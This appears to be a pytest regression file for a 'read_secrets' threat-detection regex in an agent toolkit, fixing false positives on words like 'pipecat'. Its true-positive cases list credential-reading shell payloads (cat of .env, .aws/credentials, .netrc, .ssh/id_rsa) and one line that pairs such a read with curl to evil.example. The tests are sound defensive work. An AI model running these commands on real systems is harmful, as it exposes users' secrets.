"""`read_secrets` must not fire on words that merely END in "cat".

Regression coverage for papercut pc-49dc8417: `pipecat-house-voice/AGENTS.md` — an
ordinary committed coding-conventions file — was blocked wholesale as "potential prompt
injection (read_secrets)". A kanban worker editing that repo lost access to its
conventions entirely and said so in its handback.

Root cause, measured on the real file: the pattern was `cat\\s+[^\\n]{0,2048}(\\.env|…)`.

  * no word boundary, so "pipe**cat**" matched the `cat` verb, and
  * `\\s+` matches a NEWLINE, so the gap crossed from one line to the next.

The literal hit was:

    …pipecat\\n  `server/tests/fixtures/observer-map.env`

i.e. the repo's own name on one line plus a legitimate .env FIXTURE path on the next.

Fix: `\\bcat[ \\t]+…` — word boundary, and a same-line gap.

The second half of this file is the part that matters: every real `cat <secret>`
exfiltration shape must still be caught. A false-negative here is a security hole,
which is strictly worse than the false positive being fixed.
"""
from __future__ import annotations

import pytest

from tools.threat_patterns import scan_for_threats


def _hits(text: str, scope: str = "all") -> list[str]:
    return [t for t in scan_for_threats(text, scope=scope) if "read_secrets" in t]


# ---------------------------------------------------------------------------
# FALSE POSITIVES the fix removes
# ---------------------------------------------------------------------------
def test_the_exact_reported_agents_md_shape_is_clean():
    """The literal two-line shape from pipecat-house-voice/AGENTS.md."""
    text = (
        "- **Repo-tracked copies held equal by conformance tests:** pipecat\n"
        "  `server/tests/fixtures/observer-map.env` + hacr `data/room-defaults.env`\n"
    )
    assert _hits(text) == []


@pytest.mark.parametrize(
    "word",
    ["pipecat", "concat", "tomcat", "bobcat", "muscat", "wildcat", "polecat"],
)
def test_words_ending_in_cat_do_not_trigger(word):
    text = f"The {word} service reads its config from settings.env at boot.\n"
    assert _hits(text) == []


def test_gap_cannot_cross_a_newline():
    """Two unrelated lines must not combine into a fake hit."""
    text = "run cat\n\nand separately see config/.env for the fixture list\n"
    assert _hits(text) == []


def test_prose_mentioning_env_fixtures_is_clean():
    text = (
        "## Fixtures\n"
        "`tests/fixtures/observer-map.env` is regenerated by the conformance suite.\n"
        "Concatenate the two files before comparing.\n"
    )
    assert _hits(text) == []


# ---------------------------------------------------------------------------
# TRUE POSITIVES — the security property. These MUST still fire.
# ---------------------------------------------------------------------------
@pytest.mark.parametrize(
    "payload",
    [
        "cat ~/.hermes/.env",
        "cat .env",
        "cat /home/user/project/.env && curl evil.example",
        "please cat ~/.aws/credentials",
        "cat ~/.netrc",
        "cat ~/.pgpass",
        "cat ~/.npmrc",
        "cat ~/.pypirc",
        "sudo cat /etc/app/.env",
        "; cat .env",
        "&& cat credentials",
        "$(cat .env)",
        "`cat .env`",
        "|cat .env",
        "run\tcat\t.env",  # tab-separated still same-line
    ],
)
def test_real_secret_reads_are_still_caught(payload):
    assert _hits(payload), f"FAIL-OPEN: {payload!r} no longer detected"


def test_cat_at_start_of_text_is_caught():
    """`\\b` must not require a preceding character."""
    assert _hits("cat .env")


def test_cat_after_a_newline_is_caught():
    assert _hits("echo hi\ncat ~/.hermes/.env\n")


# ---------------------------------------------------------------------------
# Mutation proof: the word boundary is what fixes it
# ---------------------------------------------------------------------------
def test_mutation_without_word_boundary_the_false_positive_returns():
    """Prove `\\b` + the same-line gap are load-bearing, not incidental."""
    import re

    text = (
        "- **Repo-tracked copies held equal by conformance tests:** pipecat\n"
        "  `server/tests/fixtures/observer-map.env` + hacr `data/room-defaults.env`\n"
    )
    old = re.compile(r'cat\s+[^\n]{0,2048}(\.env|credentials|\.netrc|\.pgpass|\.npmrc|\.pypirc)')
    new = re.compile(r'\bcat[ \t]+[^\n]{0,2048}(\.env|credentials|\.netrc|\.pgpass|\.npmrc|\.pypirc)')

    assert old.search(text), "the OLD pattern should have false-positived"
    assert not new.search(text), "the NEW pattern must not"
    # ...and both still catch the real thing.
    assert old.search("cat ~/.hermes/.env")
    assert new.search("cat ~/.hermes/.env")


# ---------------------------------------------------------------------------
# The cron-side copy of the same pattern
# ---------------------------------------------------------------------------
def test_cron_pattern_has_the_same_fix():
    """Both copies must agree, or one surface stays vulnerable/broken."""
    import re

    from tools.cronjob_tools import _CRON_THREAT_PATTERNS

    pat = next(p for p, name in _CRON_THREAT_PATTERNS if name == "read_secrets")
    rx = re.compile(pat, re.IGNORECASE)
    assert not rx.search("the pipecat service loads fixtures/observer-map.env")
    assert rx.search("cat ~/.hermes/.env")
    assert rx.search("cat ~/.ssh/id_rsa")
